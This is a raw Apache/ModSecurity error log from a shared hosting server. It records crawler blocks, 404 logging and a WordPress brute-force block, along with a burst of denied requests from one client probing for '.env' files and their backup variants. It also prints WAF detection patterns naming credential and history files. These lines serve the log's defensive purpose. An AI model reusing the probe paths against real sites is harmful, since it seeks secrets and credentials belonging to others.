[Tue May 26 17:01:03.416948 2026] [mpm_event:notice] [pid 333123:tid 333123] AH00489: Apache/2.4.67 (cPanel) OpenSSL/1.1.1w Apache mod_qos/11.76 mod_bwlimited/1.4 mod_fcgid/2.3.9 Phusion_Passenger/6.0.20 mod_rbld2.0 configured -- resuming normal operations
[Tue May 26 17:01:03.416967 2026] [core:notice] [pid 333123:tid 333123] AH00094: Command line: '/usr/sbin/httpd'
[Tue May 26 17:01:04.437715 2026] [http2:info] [pid 851641:tid 851641] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:01:04.451140 2026] [security2:error] [pid 851641:tid 851778] [client 51.68.236.64:32817] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/robots.txt"] [unique_id "ahWEeBp8QSN2510avp4QIQAAAAc"]
[Tue May 26 17:01:04.451368 2026] [security2:error] [pid 851641:tid 851778] [client 51.68.236.64:32817] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "m2wealthadvisor.com"] [uri "/robots.txt"] [unique_id "ahWEeBp8QSN2510avp4QIQAAAAc"]
[Tue May 26 17:01:04.522344 2026] [security2:error] [pid 851641:tid 851776] [client 40.124.172.38:52584] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "208.91.199.245"] [uri "/cgi-sys/404.html"] [unique_id "ahWEeBp8QSN2510avp4QKAAAAAU"], referer: https://208.91.199.245/
[Tue May 26 17:01:04.601890 2026] [security2:error] [pid 851641:tid 851792] [client 85.208.96.198:59212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahWEeBp8QSN2510avp4QRQAAABU"]
[Tue May 26 17:01:04.602045 2026] [security2:error] [pid 851641:tid 851792] [client 85.208.96.198:59212] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahWEeBp8QSN2510avp4QRQAAABU"]
[Tue May 26 17:01:04.974451 2026] [log_config:warn] [pid 839808:tid 840013] (32)Broken pipe: [client 106.202.16.248:40428] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php
[Tue May 26 17:01:04.974469 2026] [log_config:warn] [pid 839808:tid 840013] (32)Broken pipe: [client 106.202.16.248:40428] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php
[Tue May 26 17:01:06.834513 2026] [core:crit] [pid 851641:tid 851873] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:01:07.559979 2026] [security2:error] [pid 851641:tid 851824] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEeBp8QSN2510avp4QQgAAADU"]
[Tue May 26 17:01:07.565178 2026] [security2:error] [pid 851641:tid 851851] [client 113.173.243.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEeRp8QSN2510avp4QUgAAAFA"]
[Tue May 26 17:01:07.570920 2026] [security2:error] [pid 851641:tid 851821] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEeBp8QSN2510avp4QQwAAADI"]
[Tue May 26 17:01:07.578044 2026] [security2:error] [pid 851641:tid 851772] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEeRp8QSN2510avp4QbAAAAAE"]
[Tue May 26 17:01:07.610382 2026] [security2:error] [pid 851641:tid 851829] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEeBp8QSN2510avp4QPQAAADo"]
[Tue May 26 17:01:08.167690 2026] [security2:error] [pid 851641:tid 851867] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEexp8QSN2510avp4QtgAAAGA"]
[Tue May 26 17:01:09.929659 2026] [security2:error] [pid 851641:tid 851688] [remote 168.63.79.147:38050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWEfRp8QSN2510avp4Q9wAAMi4"]
[Tue May 26 17:01:10.793229 2026] [security2:error] [pid 851641:tid 851774] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEfhp8QSN2510avp4RDQAAAAM"]
[Tue May 26 17:01:11.595126 2026] [security2:error] [pid 851641:tid 851872] [client 199.34.89.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWEfxp8QSN2510avp4RKwAAAGU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:01:11.992653 2026] [security2:error] [pid 851641:tid 851860] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEfxp8QSN2510avp4RLgAAAFk"]
[Tue May 26 17:01:13.142883 2026] [security2:error] [pid 851641:tid 851774] [client 199.34.89.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWEgRp8QSN2510avp4RVwAAAAM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1239681&moderation-hash=56ffcf4ca23706c5a7783305a251802f
[Tue May 26 17:01:13.766808 2026] [log_config:warn] [pid 839808:tid 840065] (32)Broken pipe: [client 49.37.171.199:42094] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php?pn=3
[Tue May 26 17:01:13.766824 2026] [log_config:warn] [pid 839808:tid 840065] (32)Broken pipe: [client 49.37.171.199:42094] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php?pn=3
[Tue May 26 17:01:14.238752 2026] [security2:error] [pid 851641:tid 851871] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEgRp8QSN2510avp4RbQAAAGQ"]
[Tue May 26 17:01:16.221281 2026] [security2:error] [pid 851641:tid 851776] [client 199.34.89.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWEhBp8QSN2510avp4RtgAAAAU"], referer: https://anujtradingco.com
[Tue May 26 17:01:16.302250 2026] [security2:error] [pid 851641:tid 851786] [client 176.65.139.234:21638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gbogbonise.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWEhBp8QSN2510avp4RugAAAA8"]
[Tue May 26 17:01:16.357894 2026] [security2:error] [pid 851641:tid 851779] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEgxp8QSN2510avp4RqQAAAAg"]
[Tue May 26 17:01:16.813336 2026] [security2:error] [pid 851641:tid 851805] [client 5.255.111.197:15100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env"] [unique_id "ahWEhBp8QSN2510avp4RygAAACI"]
[Tue May 26 17:01:16.974466 2026] [security2:error] [pid 851641:tid 851846] [client 5.255.111.197:15118] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/app/.env"] [unique_id "ahWEhBp8QSN2510avp4RzwAAAEs"]
[Tue May 26 17:01:16.986020 2026] [security2:error] [pid 851641:tid 851799] [client 5.255.111.197:15132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/backend/.env"] [unique_id "ahWEhBp8QSN2510avp4R2AAAABw"]
[Tue May 26 17:01:17.011196 2026] [security2:error] [pid 851641:tid 851877] [client 5.255.111.197:15114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/api/.env"] [unique_id "ahWEhRp8QSN2510avp4R5gAAAGo"]
[Tue May 26 17:01:17.920391 2026] [security2:error] [pid 851641:tid 851895] [client 5.255.111.197:15258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production.copy"] [unique_id "ahWEhRp8QSN2510avp4SCwAAAHw"]
[Tue May 26 17:01:18.210402 2026] [security2:error] [pid 851641:tid 851801] [client 5.255.111.197:31754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local.backup"] [unique_id "ahWEhhp8QSN2510avp4SGQAAAB4"]
[Tue May 26 17:01:18.210500 2026] [security2:error] [pid 851641:tid 851861] [client 5.255.111.197:31810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production.old"] [unique_id "ahWEhhp8QSN2510avp4SHwAAAFo"]
[Tue May 26 17:01:18.210577 2026] [security2:error] [pid 851641:tid 851840] [client 5.255.111.197:31712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production~"] [unique_id "ahWEhhp8QSN2510avp4SHQAAAEU"]
[Tue May 26 17:01:18.210732 2026] [security2:error] [pid 851641:tid 851867] [client 5.255.111.197:31824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production.backup"] [unique_id "ahWEhhp8QSN2510avp4SGAAAAGA"]
[Tue May 26 17:01:18.210891 2026] [security2:error] [pid 851641:tid 851874] [client 5.255.111.197:31634] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.orig"] [unique_id "ahWEhhp8QSN2510avp4SGgAAAGc"]
[Tue May 26 17:01:18.211165 2026] [security2:error] [pid 851641:tid 851777] [client 5.255.111.197:31744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local.old"] [unique_id "ahWEhhp8QSN2510avp4SIgAAAAY"]
[Tue May 26 17:01:18.211318 2026] [security2:error] [pid 851641:tid 851849] [client 5.255.111.197:31774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local~"] [unique_id "ahWEhhp8QSN2510avp4SJgAAAE4"]
[Tue May 26 17:01:18.211391 2026] [security2:error] [pid 851641:tid 851829] [client 5.255.111.197:31806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production.bak"] [unique_id "ahWEhhp8QSN2510avp4SIAAAADo"]
[Tue May 26 17:01:18.211433 2026] [security2:error] [pid 851641:tid 851826] [client 5.255.111.197:31734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local.bak"] [unique_id "ahWEhhp8QSN2510avp4SIQAAADc"]
[Tue May 26 17:01:18.212031 2026] [security2:error] [pid 851641:tid 851792] [client 5.255.111.197:31658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.bak"] [unique_id "ahWEhhp8QSN2510avp4SJwAAABU"]
[Tue May 26 17:01:18.212277 2026] [security2:error] [pid 851641:tid 851857] [client 5.255.111.197:31790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local.orig"] [unique_id "ahWEhhp8QSN2510avp4SFgAAAFY"]
[Tue May 26 17:01:18.212544 2026] [security2:error] [pid 851641:tid 851820] [client 5.255.111.197:31862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production.orig"] [unique_id "ahWEhhp8QSN2510avp4SJAAAADE"]
[Tue May 26 17:01:18.213164 2026] [security2:error] [pid 851641:tid 851855] [client 5.255.111.197:31784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local.swp"] [unique_id "ahWEhhp8QSN2510avp4SHAAAAFQ"]
[Tue May 26 17:01:18.213180 2026] [security2:error] [pid 851641:tid 851840] [client 5.255.111.197:31702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env~"] [unique_id "ahWEhhp8QSN2510avp4SKAAAAEU"]
[Tue May 26 17:01:18.213252 2026] [security2:error] [pid 851641:tid 851817] [client 5.255.111.197:31848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.production.swp"] [unique_id "ahWEhhp8QSN2510avp4SGwAAAC4"]
[Tue May 26 17:01:18.213664 2026] [security2:error] [pid 851641:tid 851853] [client 5.255.111.197:31724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.copy"] [unique_id "ahWEhhp8QSN2510avp4SIwAAAFI"]
[Tue May 26 17:01:18.214040 2026] [security2:error] [pid 851641:tid 851775] [client 5.255.111.197:31636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.swp"] [unique_id "ahWEhhp8QSN2510avp4SKQAAAAQ"]
[Tue May 26 17:01:18.214042 2026] [security2:error] [pid 851641:tid 851882] [client 5.255.111.197:15258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.backup"] [unique_id "ahWEhhp8QSN2510avp4SKgAAAG8"]
[Tue May 26 17:01:18.214602 2026] [security2:error] [pid 851641:tid 851858] [client 5.255.111.197:31802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.local.copy"] [unique_id "ahWEhhp8QSN2510avp4SJQAAAFc"]
[Tue May 26 17:01:18.300747 2026] [security2:error] [pid 851641:tid 851822] [client 5.255.111.197:31674] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "acacia.svijaykumar.in"] [uri "/.env.old"] [unique_id "ahWEhhp8QSN2510avp4SLQAAADM"]
[Tue May 26 17:01:18.961470 2026] [security2:error] [pid 851641:tid 851823] [client 45.87.252.100:45749] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWEhRp8QSN2510avp4SDwAAADQ"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:01:19.089819 2026] [security2:error] [pid 851641:tid 851842] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEhhp8QSN2510avp4SPAAAAEc"]
[Tue May 26 17:01:21.186408 2026] [security2:error] [pid 851641:tid 851869] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEiBp8QSN2510avp4ScgAAAGI"]
[Tue May 26 17:01:22.953797 2026] [security2:error] [pid 851641:tid 851822] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWEihp8QSN2510avp4SqgAAADM"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 17:01:23.250991 2026] [security2:error] [pid 851641:tid 851820] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEihp8QSN2510avp4SpgAAADE"]
[Tue May 26 17:01:25.828063 2026] [security2:error] [pid 851641:tid 851875] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEjRp8QSN2510avp4S8gAAAGg"]
